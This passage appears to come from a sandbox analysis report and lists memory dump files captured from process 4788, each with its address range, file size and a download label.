5.7MB

Download
memory/4788-22-0x0000000006150000-0x000000000619C000-memory.dmp

Filesize
304KB

Download
memory/4788-70-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-66-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-80-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-88-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-92-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-90-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-86-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-84-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-82-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-78-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-76-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-74-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-94-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-476-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

Filesize
4KB

Download
memory/4788-503-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-760-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-1185-0x000000000B2F0000-0x000000000B818000-memory.dmp

Filesize
5.2MB

Download
memory/4788-20-0x0000000005B20000-0x0000000005E74000-memory.dmp

Filesize
3.3MB

Download
memory/4788-10-0x0000000005280000-0x00000000052E6000-memory.dmp

Filesize
408KB

Download
memory/4788-9-0x00000000051A0000-0x0000000005206000-memory.dmp

Filesize
408KB

Download
memory/4788-8-0x0000000005100000-0x0000000005122000-memory.dmp

Filesize
136KB

Download
memory/4788-6-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-7-0x00000000054F0000-0x0000000005B18000-memory.dmp

Filesize
6.2MB

Download
memory/4788-5-0x0000000002B20000-0x0000000002B56000-memory.dmp

Filesize
216KB

Download
memory/4788-4-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

Filesize
4KB

Download
memory/4788-1186-0x00000000075F0000-0x000000000763C000-memory.dmp

Filesize
304KB

Download
memory/4788-1190-0x000000000B190000-0x000000000B1E4000-memory.dmp

Filesize
336KB

Download
memory/4788-1242-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download